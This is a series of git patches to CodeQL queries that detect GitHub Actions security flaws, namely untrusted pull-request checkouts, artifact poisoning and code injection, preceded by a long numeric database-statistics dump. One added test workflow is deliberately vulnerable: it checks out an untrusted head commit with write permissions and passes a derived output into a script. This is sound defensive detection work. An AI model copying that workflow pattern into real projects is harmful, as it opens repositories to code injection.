-35122 - - -fileid -39721 - - - - -id -name - - -12 - - -1 -2 -1270313 - - - - - - -id -parentid - - -12 - - -1 -2 -1270313 - - - - - - -id -idx - - -12 - - -1 -2 -1270313 - - - - - - -id -fileid - - -12 - - -1 -2 -1270313 - - - - - - -name -id - - -12 - - -1 -2 -420 - - -2 -5 -156 - - -5 -6 -3832 - - -6 -310317 -247 - - - - - - -name -parentid - - -12 - - -1 -2 -456 - - -2 -5 -150 - - -5 -6 -3829 - - -6 -161565 -220 - - - - - - -name -idx - - -12 - - -1 -2 -4358 - - -2 -35123 -297 - - - - - - -name -fileid - - -12 - - -1 -2 -486 - - -2 -5 -133 - - -5 -6 -3831 - - -6 -14503 -205 - - - - - - -parentid -id - - -12 - - -1 -2 -371969 - - -2 -3 -62095 - - -3 -4 -104113 - - -4 -35123 -39844 - - - - - - -parentid -name - - -12 - - -1 -2 -500482 - - -2 -3 -17866 - - -3 -4 -49117 - - -4 -45 -10556 - - - - - - -parentid -idx - - -12 - - -1 -2 -371969 - - -2 -3 -62095 - - -3 -4 -104113 - - -4 -35123 -39844 - - - - - - -parentid -fileid - - -12 - - -1 -2 -578021 - - - - - - -idx -id - - -12 - - -2 -3 -606 - - -4 -5 -17851 - - -5 -6 -6533 - - -6 -7 -859 - - -7 -8 -4471 - - -9 -16 -2719 - - -16 -578022 -2083 - - - - - - -idx -name - - -12 - - -1 -2 -18457 - - -2 -3 -6533 - - -3 -4 -6178 - - -4 -8 -2624 - - -8 -4397 -1330 - - - - - - -idx -parentid - - -12 - - -2 -3 -606 - - -4 -5 -17851 - - -5 -6 -6533 - - -6 -7 -859 - - -7 -8 -4471 - - -9 -16 -2719 - - -16 -578022 -2083 - - - - - - -idx -fileid - - -12 - - -2 -3 -606 - - -4 -5 -17851 - - -5 -6 -6533 - - -6 -7 -859 - - -7 -8 -4471 - - -9 -16 -2719 - - -16 -39722 -2083 - - - - - - -fileid -id - - -12 - - -1 -2 -20457 - - -2 -3 -3115 - - -3 -7 -3026 - - -7 -8 -3588 - - -8 -9 -2220 - - -9 -11 -3099 - - -11 -19 -3087 - - -19 -114506 -1129 - - - - - - -fileid -name - - -12 - - -1 -2 -20459 - - -2 -3 -3458 - - -3 -5 -2569 - - -5 -7 -2172 - - -7 -8 -6158 - - -8 -9 -3501 - - -9 -46 -1404 - - - - - - -fileid -parentid - - -12 - - -1 -2 -20457 - - -2 -3 -3870 - - -3 -5 -2152 - - -5 -6 -2876 - - -6 -7 -2720 - - -7 -8 -4132 - - -8 -14 -3096 - - -14 -31079 -418 - - - - - - -fileid -idx - - -12 - - -1 -2 -25894 - - -2 -3 -5301 - - -3 -4 -3787 - - -4 -6 -3268 - - -6 -35123 -1471 - - - - - - - - -xmlAttrs -1202020 - - -id -1202020 - - -elementid -760198 - - -name -3649 - - -value -121803 - - -idx -2000 - - -fileid -39448 - - - - -id -elementid - - -12 - - -1 -2 -1202020 - - - - - - -id -name - - -12 - - -1 -2 -1202020 - - - - - - -id -value - - -12 - - -1 -2 -1202020 - - - - - - -id -idx - - -12 - - -1 -2 -1202020 - - - - - - -id -fileid - - -12 - - -1 -2 -1202020 - - - - - - -elementid -id - - -12 - - -1 -2 -425697 - - -2 -3 -249659 - - -3 -4 -66474 - - -4 -2001 -18368 - - - - - - -elementid -name - - -12 - - -1 -2 -425778 - - -2 -3 -249579 - - -3 -4 -66475 - - -4 -2001 -18366 - - - - - - -elementid -value - - -12 - - -1 -2 -466237 - - -2 -3 -266291 - - -3 -46 -27670 - - - - - - -elementid -idx - - -12 - - -1 -2 -425697 - - -2 -3 -249659 - - -3 -4 -66474 - - -4 -2001 -18368 - - - - - - -elementid -fileid - - -12 - - -1 -2 -760198 - - - - - - -name -id - - -12 - - -1 -2 -3467 - - -2 -262475 -182 - - - - - - -name -elementid - - -12 - - -1 -2 -3467 - - -2 -262475 -182 - - - - - - -name -value - - -12 - - -1 -2 -3501 - - -2 -54146 -148 - - - - - - -name -idx - - -12 - - -1 -2 -3531 - - -2 -11 -118 - - - - - - -name -fileid - - -12 - - -1 -2 -3491 - - -2 -21768 -158 - - - - - - -value -id - - -12 - - -1 -2 -72032 - - -2 -3 -42366 - - -3 -199269 -7405 - - - - - - -value -elementid - - -12 - - -1 -2 -72036 - - -2 -3 -42374 - - -3 -199269 -7393 - - - - - - -value -name - - -12 - - -1 -2 -116722 - - -2 -2041 -5081 - - - - - - -value -idx - - -12 - - -1 -2 -117957 - - -2 -2001 -3846 - - - - - - -value -fileid - - -12 - - -1 -2 -86306 - - -2 -3 -28570 - - -3 -4175 -6927 - - - - - - -idx -id - - -12 - - -1 -2 -1955 - - -2 -760199 -45 - - - - - - -idx -elementid - - -12 - - -1 -2 -1955 - - -2 -760199 -45 - - - - - - -idx -name - - -12 - - -1 -2 -1955 - - -2 -189 -45 - - - - - - -idx -value - - -12 - - -1 -2 -1955 - - -2 -116643 -45 - - - - - - -idx -fileid - - -12 - - -1 -2 -1955 - - -2 -39449 -45 - - - - - - -fileid -id - - -12 - - -1 -2 -22884 - - -2 -4 -2565 - - -4 -6 -2294 - - -6 -7 -3299 - - -7 -9 -3272 - - -9 -16 -3143 - - -16 -129952 -1991 - - - - - - -fileid -elementid - - -12 - - -1 -2 -23890 - - -2 -4 -2131 - - -4 -5 -1971 - - -5 -6 -4096 - - -6 -8 -3519 - - -8 -16 -3137 - - -16 -106600 -704 - - - - - - -fileid -name - - -12 - - -1 -2 -22946 - - -2 -3 -2338 - - -3 -4 -2726 - - -4 -5 -2824 - - -5 -6 -2994 - - -6 -7 -3876 - - -7 -2002 -1744 - - - - - - -fileid -value - - -12 - - -1 -2 -22916 - - -2 -4 -2772 - - -4 -5 -2112 - - -5 -6 -3510 - - -6 -8 -1993 - - -8 -11 -3365 - - -11 -50357 -2780 - - - - - - -fileid -idx - - -12 - - -1 -2 -26133 - - -2 -3 -9699 - - -3 -5 -3511 - - -5 -2001 -105 - - - - - - - - -xmlNs -71201 - - -id -4185 - - -prefixName -958 - - -URI -4185 - - -fileid -39544 - - - - -id -prefixName - - -12 - - -1 -2 -2602 - - -2 -3 -1553 - - -3 -872 -30 - - - - - - -id -URI - - -12 - - -1 -2 -4185 - - - - - - -id -fileid - - -12 - - -1 -6 -274 - - -6 -7 -3825 - - -7 -24905 -86 - - - - - - -prefixName -id - - -12 - - -1 -2 -915 - - -2 -4054 -43 - - - - - - -prefixName -URI - - -12 - - -1 -2 -915 - - -2 -4054 -43 - - - - - - -prefixName -fileid - - -12 - - -1 -2 -828 - - -2 -5 -73 - - -5 -24903 -57 - - - - - - -URI -id - - -12 - - -1 -2 -4185 - - - - - - -URI -prefixName - - -12 - - -1 -2 -2602 - - -2 -3 -1553 - - -3 -872 -30 - - - - - - -URI -fileid - - -12 - - -1 -6 -274 - - -6 -7 -3825 - - -7 -24905 -86 - - - - - - -fileid -id - - -12 - - -1 -2 -11655 - - -2 -3 -26146 - - -3 -8 -1743 - - - - - - -fileid -prefixName - - -12 - - -1 -2 -11653 - - -2 -3 -25982 - - -3 -31 -1909 - - - - - - -fileid -URI - - -12 - - -1 -2 -11655 - - -2 -3 -26146 - - -3 -8 -1743 - - - - - - - - -xmlHasNs -1139730 - - -elementId -1139730 - - -nsId -4136 - - -fileid -39537 - - - - -elementId -nsId - - -12 - - -1 -2 -1139730 - - - - - - -elementId -fileid - - -12 - - -1 -2 -1139730 - - - - - - -nsId -elementId - - -12 - - -1 -5 -234 - - -5 -6 -3824 - - -6 -643289 -78 - - - - - - -nsId -fileid - - -12 - - -1 -5 -257 - - -5 -6 -3823 - - -6 -24759 -56 - - - - - - -fileid -elementId - - -12 - - -1 -2 -3669 - - -2 -3 -20429 - - -3 -7 -2536 - - -7 -8 -3473 - - -8 -9 -2258 - - -9 -11 -3036 - - -11 -18 -2966 - - -18 -147552 -1170 - - - - - - -fileid -nsId - - -12 - - -1 -2 -18261 - - -2 -3 -21032 - - -3 -8 -244 - - - - - - - - -xmlComments -26812 - - -id -26812 - - -text -22933 - - -parentid -26546 - - -fileid -26368 - - - - -id -text - - -12 - - -1 -2 -26812 - - - - - - -id -parentid - - -12 - - -1 -2 -26812 - - - - - - -id -fileid - - -12 - - -1 -2 -26812 - - - - - - -text -id - - -12 - - -1 -2 -21517 - - -2 -62 -1416 - - - - - - -text -parentid - - -12 - - -1 -2 -21519 - - -2 -62 -1414 - - - - - - -text -fileid - - -12 - - -1 -2 -21522 - - -2 -62 -1411 - - - - - - -parentid -id - - -12 - - -1 -2 -26379 - - -2 -17 -167 - - - - - - -parentid -text - - -12 - - -1 -2 -26379 - - -2 -17 -167 - - - - - - -parentid -fileid - - -12 - - -1 -2 -26546 - - - - - - -fileid -id - - -12 - - -1 -2 -26161 - - -2 -17 -207 - - - - - - -fileid -text - - -12 - - -1 -2 -26165 - - -2 -17 -203 - - - - - - -fileid -parentid - - -12 - - -1 -2 -26223 - - -2 -10 -145 - - - - - - - - -xmlChars -439958 - - -id -439958 - - -text -100518 - - -parentid -433851 - - -idx -4 - - -isCDATA -1 - - -fileid -26494 - - - - -id -text - - -12 - - -1 -2 -439958 - - - - - - -id -parentid - - -12 - - -1 -2 -439958 - - - - - - -id -idx - - -12 - - -1 -2 -439958 - - - - - - -id -isCDATA - - -12 - - -1 -2 -439958 - - - - - - -id -fileid - - -12 - - -1 -2 -439958 - - - - - - -text -id - - -12 - - -1 -2 -60389 - - -2 -4 -3811 - - -4 -5 -29257 - - -5 -23171 -7061 - - - - - - -text -parentid - - -12 - - -1 -2 -60389 - - -2 -4 -3811 - - -4 -5 -29257 - - -5 -23171 -7061 - - - - - - -text -idx - - -12 - - -1 -2 -100517 - - -2 -3 -1 - - - - - - -text -isCDATA - - -12 - - -1 -2 -100518 - - - - - - -text -fileid - - -12 - - -1 -2 -61284 - - -2 -4 -4205 - - -4 -5 -28328 - - -5 -351 -6701 - - - - - - -parentid -id - - -12 - - -1 -2 -429716 - - -2 -5 -4135 - - - - - - -parentid -text - - -12 - - -1 -2 -429716 - - -2 -5 -4135 - - - - - - -parentid -idx - - -12 - - -1 -2 -429716 - - -2 -5 -4135 - - - - - - -parentid -isCDATA - - -12 - - -1 -2 -433851 - - - - - - -parentid -fileid - - -12 - - -1 -2 -433851 - - - - - - -idx -id - - -12 - - -80 -81 -1 - - -1892 -1893 -1 - - -4135 -4136 -1 - - -433851 -433852 -1 - - - - - - -idx -text - - -12 - - -1 -2 -1 - - -3 -4 -1 - - -16 -17 -1 - - -100499 -100500 -1 - - - - - - -idx -parentid - - -12 - - -80 -81 -1 - - -1892 -1893 -1 - - -4135 -4136 -1 - - -433851 -433852 -1 - - - - - - -idx -isCDATA - - -12 - - -1 -2 -4 - - - - - - -idx -fileid - - -12 - - -4 -5 -1 - - -46 -47 -1 - - -97 -98 -1 - - -26494 -26495 -1 - - - - - - -isCDATA -id - - -12 - - -439958 -439959 -1 - - - - - - -isCDATA -text - - -12 - - -100518 -100519 -1 - - - - - - -isCDATA -parentid - - -12 - - -433851 -433852 -1 - - - - - - -isCDATA -idx - - -12 - - -4 -5 -1 - - - - - - -isCDATA -fileid - - -12 - - -26494 -26495 -1 - - - - - - -fileid -id - - -12 - - -1 -2 -25303 - - -2 -35123 -1191 - - - - - - -fileid -text - - -12 - - -1 -2 -25765 - - -2 -35123 -729 - - - - - - -fileid -parentid - - -12 - - -1 -2 -25312 - - -2 -35123 -1182 - - - - - - -fileid -idx - - -12 - - -1 -2 -26397 - - -2 -5 -97 - - - - - - -fileid -isCDATA - - -12 - - -1 -2 -26494 - - - - - - - - -xmllocations -3051056 - - -xmlElement -2982460 - - -location -3051056 - - - - -xmlElement -location - - -12 - - -1 -2 -2978326 - - -2 -24903 -4134 - - - - - - -location -xmlElement - - -12 - - -1 -2 -3051056 - - - - - - - - -filetype -1102 - - -file -1102 - - -filetype -3 - - - - -file -filetype - - -12 - - -1 -2 -1102 - - - - - - -filetype -file - - -12 - - -1 -2 -1 - - -162 -163 -1 - - -939 -940 -1 - - - - - - - - -configs -69795 - - -id -69795 - - - - - -configNames -69794 - - -id -69794 - - -config -69794 - - -name -12859 - - - - -id -config - - -12 - - -1 -2 -69794 - - - - - - -id -name - - -12 - - -1 -2 -69794 - - - - - - -config -id - - -12 - - -1 -2 -69794 - - - - - - -config -name - - -12 - - -1 -2 -69794 - - - - - - -name -id - - -12 - - -1 -2 -4858 - - -2 -3 -593 - - -3 -4 -2806 - - -4 -10 -169 - - -10 -11 -1900 - - -11 -12 -1757 - - -12 -111 -776 - - - - - - -name -config - - -12 - - -1 -2 -4858 - - -2 -3 -593 - - -3 -4 -2806 - - -4 -10 -169 - - -10 -11 -1900 - - -11 -12 -1757 - - -12 -111 -776 - - - - - - - - -configValues -69691 - - -id -69691 - - -config -69691 - - -value -54399 - - - - -id -config - - -12 - - -1 -2 -69691 - - - - - - -id -value - - -12 - - -1 -2 -69691 - - - - - - -config -id - - -12 - - -1 -2 -69691 - - - - - - -config -value - - -12 - - -1 -2 -69691 - - - - - - -value -id - - -12 - - -1 -2 -48220 - - -2 -4 -4804 - - -4 -546 -1375 - - - - - - -value -config - - -12 - - -1 -2 -48220 - - -2 -4 -4804 - - -4 -546 -1375 - - - - - - - - -configLocations -209280 - - -locatable -209280 - - -location -209280 - - - - -locatable -location - - -12 - - -1 -2 -209280 - - - - - - -location -locatable - - -12 - - -1 -2 -209280 - - - - - - - - -extraction_time -378 - - -file -21 - - -extractionPhase -9 - - -timerKind -2 - - -time -43 - - - - -file -extractionPhase - - -12 - - -9 -10 -21 - - - - - - -file -timerKind - - -12 - - -2 -3 -21 - - - - - - -file -time - - -12 - - -3 -4 -21 - - - - - - -extractionPhase -file - - -12 - - -21 -22 -9 - - - - - - -extractionPhase -timerKind - - -12 - - -2 -3 -9 - - - - - - -extractionPhase -time - - -12 - - -1 -2 -8 - - -42 -43 -1 - - - - - - -timerKind -file - - -12 - - -21 -22 -2 - - - - - - -timerKind -extractionPhase - - -12 - - -9 -10 -2 - - - - - - -timerKind -time - - -12 - - -22 -23 -2 - - - - - - -time -file - - -12 - - -1 -2 -42 - - -21 -22 -1 - - - - - - -time -extractionPhase - - -12 - - -1 -2 -42 - - -8 -9 -1 - - - - - - -time -timerKind - - -12 - - -1 -2 -42 - - -2 -3 -1 - - - - - - - - -extraction_data -21 - - -file -21 - - -cacheFile -21 - - -fromCache -1 - - -length -21 - - - - -file -cacheFile - - -12 - - -1 -2 -21 - - - - - - -file -fromCache - - -12 - - -1 -2 -21 - - - - - - -file -length - - -12 - - -1 -2 -21 - - - - - - -cacheFile -file - - -12 - - -1 -2 -21 - - - - - - -cacheFile -fromCache - - -12 - - -1 -2 -21 - - - - - - -cacheFile -length - - -12 - - -1 -2 -21 - - - - - - -fromCache -file - - -12 - - -21 -22 -1 - - - - - - -fromCache -cacheFile - - -12 - - -21 -22 -1 - - - - - - -fromCache -length - - -12 - - -21 -22 -1 - - - - - - -length -file - - -12 - - -1 -2 -21 - - - - - - -length -cacheFile - - -12 - - -1 -2 -21 - - - - - - -length -fromCache - - -12 - - -1 -2 -21 - - - - - - - - - diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 21e0b8bb0e91..c4ef87bc2512 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml @@ -2,15 +2,25 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 1.0.1 + version: 1.0.10 codeql/dataflow: - version: 1.0.1 + version: 1.1.4 + codeql/javascript-all: + version: 2.0.2 + codeql/mad: + version: 1.0.10 + codeql/regex: + version: 1.0.10 codeql/ssa: - version: 1.0.1 + version: 1.0.10 + codeql/tutorial: + version: 1.0.10 codeql/typetracking: - version: 1.0.1 + version: 1.0.10 codeql/util: - version: 1.0.1 + version: 1.0.10 + codeql/xml: + version: 1.0.10 codeql/yaml: - version: 1.0.1 + version: 1.0.10 compiled: false diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual deleted file mode 100644 index 3c8904a86af1..000000000000 --- a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual +++ /dev/null @@ -1 +0,0 @@ -| .github/workflows/defaultable_workflow.yml:44:9:55:6 | Uses Step | CodeQL Action could use default setup instead of advanced configuration. | From df3b30489b515c36ce9ecd112cca15a6154d70df Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Wed, 13 Nov 2024 13:50:41 -0500 Subject: [PATCH 674/707] Add `--search-path` in test workflow --- .github/workflows/test.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 96fd8bdd1a4b..9b07d1e74785 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -27,11 +27,11 @@ jobs: GITHUB_TOKEN: ${{ github.token }} run: | gh repo clone github/codeql - codeql pack install "ql/lib" - codeql pack install "ql/src" - codeql pack install "ql/test" + codeql pack ci "ql/lib" + codeql pack ci "ql/src" + codeql pack ci "ql/test" - name: Run Tests env: GITHUB_TOKEN: ${{ github.token }} run: | - codeql test run ql/test + codeql test run --search-path "${{ github.workspace }}/extractor" ql/test From 3ce3cf43bede831cf888cc9d7dec5cc38e8fb2cc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 19 Nov 2024 11:31:35 +0100 Subject: [PATCH 675/707] refactor common code to identify untrusted checkouts --- .../codeql/actions/dataflow/FlowSources.qll | 47 +------------------ .../security/ArtifactPoisoningQuery.qll | 15 +++--- .../security/OutputClobberingQuery.qll | 21 +-------- .../security/UntrustedCheckoutQuery.qll | 25 ++++++++++ 4 files changed, 37 insertions(+), 71 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 2fca425642e7..cf1763b1c03c 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -92,28 +92,7 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { GitCommandSource() { exists(Step checkout, string cmd_regex | - // This should be: - // source instanceof PRHeadCheckoutStep - // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error - // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround - // instead of using ActionsMutableRefCheckout and ActionsSHACheckout - ( - exists(Uses uses | - checkout = uses and - uses.getCallee() = "actions/checkout" and - exists(uses.getArgument("ref")) and - not uses.getArgument("ref").matches("%base%") and - uses.getATriggerEvent().getName() = checkoutTriggers() - ) - or - checkout instanceof GitMutableRefCheckout - or - checkout instanceof GitSHACheckout - or - checkout instanceof GhMutableRefCheckout - or - checkout instanceof GhSHACheckout - ) and + checkout instanceof SimplePRHeadCheckoutStep and this.asExpr() = run.getScript() and checkout.getAFollowingStep() = run and run.getScript().getAStmt() = cmd and @@ -255,29 +234,7 @@ class ArtifactSource extends RemoteFlowSource, FileSource { private class CheckoutSource extends RemoteFlowSource, FileSource { Event event; - CheckoutSource() { - // This should be: - // source instanceof PRHeadCheckoutStep - // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error - // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround - // instead of using ActionsMutableRefCheckout and ActionsSHACheckout - exists(Uses uses | - this.asExpr() = uses and - uses.getCallee() = "actions/checkout" and - exists(uses.getArgument("ref")) and - not uses.getArgument("ref").matches("%base%") and - event = uses.getATriggerEvent() and - event.getName() = checkoutTriggers() - ) - or - this.asExpr() instanceof GitMutableRefCheckout - or - this.asExpr() instanceof GitSHACheckout - or - this.asExpr() instanceof GhMutableRefCheckout - or - this.asExpr() instanceof GhSHACheckout - } + CheckoutSource() { this.asExpr() instanceof SimplePRHeadCheckoutStep } override string getSourceType() { result = "artifact" } diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 31427287b0c8..d8d5f83c867d 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -3,6 +3,7 @@ private import codeql.actions.TaintTracking import codeql.actions.DataFlow import codeql.actions.dataflow.FlowSources import codeql.actions.security.PoisonableSteps +import codeql.actions.security.UntrustedCheckoutQuery string unzipRegexp() { result = "(unzip|tar)\\s+.*" } @@ -22,11 +23,10 @@ class GitHubDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, Us exists(this.getArgument("github-token")) or // There is an artifact upload step in the same workflow which can be influenced by an attacker on a checkout step - exists(LocalJob job, UsesStep checkout, UsesStep upload | + exists(LocalJob job, SimplePRHeadCheckoutStep checkout, UsesStep upload | this.getEnclosingWorkflow().getAJob() = job and job.getAStep() = checkout and - job.getATriggerEvent().getName() = "pull_request_target" and - checkout.getCallee() = "actions/checkout" and + checkout.getATriggerEvent().getName() = "pull_request_target" and checkout.getAFollowingStep() = upload and upload.getCallee() = "actions/upload-artifact" ) @@ -55,8 +55,10 @@ class DownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep "ma-ve/action-download-artifact-with-retry" ] and ( - not exists(this.getArgument(["branch", "branch_name"])) or - not this.getArgument(["branch", "branch_name"]) = ["main", "master"] + not exists(this.getArgument(["branch", "branch_name"])) + or + exists(this.getArgument(["branch", "branch_name"])) and + this.getArgument("allow_forks") = "true" ) and ( not exists(this.getArgument(["commit", "commitHash", "commit_sha"])) or @@ -74,7 +76,8 @@ class DownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep ) and ( not exists(this.getArgument("pr")) or - not this.getArgument("pr").matches("%github.event.pull_request.number%") + not this.getArgument("pr") + .matches(["%github.event.pull_request.number%", "%github.event.number%"]) ) } diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index e6cc0d06a466..1d0de83afa34 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -20,26 +20,7 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { ( step instanceof UntrustedArtifactDownloadStep or - // This should be: - // artifact instanceof PRHeadCheckoutStep - // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error - // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround - // instead of using ActionsMutableRefCheckout and ActionsSHACheckout - exists(Uses uses | - step = uses and - uses.getCallee() = "actions/checkout" and - exists(uses.getArgument("ref")) and - not uses.getArgument("ref").matches("%base%") and - uses.getATriggerEvent().getName() = checkoutTriggers() - ) - or - step instanceof GitMutableRefCheckout - or - step instanceof GitSHACheckout - or - step instanceof GhMutableRefCheckout - or - step instanceof GhSHACheckout + step instanceof SimplePRHeadCheckoutStep ) and step.getAFollowingStep() = run and this.asExpr() = run.getScript() and diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 9653ae2beda1..1a75f8a96c16 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -193,6 +193,31 @@ predicate containsHeadRef(string s) { ) } +class SimplePRHeadCheckoutStep extends Step { + SimplePRHeadCheckoutStep() { + // This should be: + // artifact instanceof PRHeadCheckoutStep + // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error + // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround + // instead of using ActionsMutableRefCheckout and ActionsSHACheckout + exists(Uses uses | + this = uses and + uses.getCallee() = "actions/checkout" and + exists(uses.getArgument("ref")) and + not uses.getArgument("ref").matches("%base%") and + uses.getATriggerEvent().getName() = checkoutTriggers() + ) + or + this instanceof GitMutableRefCheckout + or + this instanceof GitSHACheckout + or + this instanceof GhMutableRefCheckout + or + this instanceof GhSHACheckout + } +} + /** Checkout of a Pull Request HEAD */ abstract class PRHeadCheckoutStep extends Step { abstract string getPath(); From afb7967a0cde8e0018678cc2c5453515828f36d1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 19 Nov 2024 11:31:59 +0100 Subject: [PATCH 676/707] Delete .actual test files --- .../CodeQL/UnnecessaryUseOfAdvancedConfig.actual | 1 - 1 file changed, 1 deletion(-) delete mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual deleted file mode 100644 index 3c8904a86af1..000000000000 --- a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual +++ /dev/null @@ -1 +0,0 @@ -| .github/workflows/defaultable_workflow.yml:44:9:55:6 | Uses Step | CodeQL Action could use default setup instead of advanced configuration. | From 082b4c3ca2c28032e28361dd9eda4351cafed333 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 20 Nov 2024 15:35:49 +0100 Subject: [PATCH 677/707] Add poisonable step for pip install . --- ql/lib/ext/config/poisonable_steps.yml | 6 +-- .../CWE-094/.github/workflows/test27.yml | 52 +++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 12 +++++ .../CWE-094/CodeInjectionMedium.expected | 11 ++++ .../CWE-829/.github/workflows/test7.yml | 1 + .../UntrustedCheckoutCritical.expected | 6 ++- 6 files changed, 83 insertions(+), 5 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 2f03b94b4027..87ed8eec76f1 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -41,9 +41,9 @@ extensions: - ["pre-commit"] - ["prettier"] - ["phpstan"] - - ["pip\\s+install\\s+-r"] - - ["pip\\s+install\\s+--requirement"] - - ["pipx\\s+install\\s+\\."] + - ["pip\\s+install(.*)\\s+-r"] + - ["pip\\s+install(.*)\\s+--requirement"] + - ["pip(x)?\\s+install(.*)\\s+\\."] - ["poetry"] - ["pylint"] - ["pytest"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml new file mode 100644 index 000000000000..e9ba77c0f939 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml @@ -0,0 +1,52 @@ +name: Test WR + +on: + workflow_run: + workflows: + - Test + types: + - completed + +permissions: + contents: write + pull-requests: write + +jobs: + setup: + name: Setup + runs-on: ubuntu-24.04 + outputs: + github-sha: ${{ steps.get-sha.outputs.sha }} + chart-version: ${{ steps.get-version.outputs.chart_version }} + steps: + - name: Get triggering event SHA + id: get-sha + run: | + if [[ "${{ github.event_name }}" == "workflow_dispatch" ]]; then + echo sha="${{ inputs.checkout_ref }}" >> $GITHUB_OUTPUT + elif [[ "${{ github.event_name }}" == "workflow_run" ]]; then + echo sha="${{ github.event.workflow_run.head_sha }}" >> $GITHUB_OUTPUT + elif [[ "${{ github.event_name }}" == "push" ]]; then + echo sha="${{ github.sha }}" >> $GITHUB_OUTPUT + else + echo "Invalid event type" + exit 1 + fi + - name: Checkout Source Code + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + with: + persist-credentials: false + ref: ${{ steps.get-sha.outputs.sha }} + fetch-depth: 0 + - name: Get version + id: get-version + run: | + echo "chart_version=$(> $GITHUB_OUTPUT | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | ${{ needs.setup.outputs.chart-version }} | .github/workflows/test27.yml:4:3:4:14 | workflow_run | workflow_run | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | 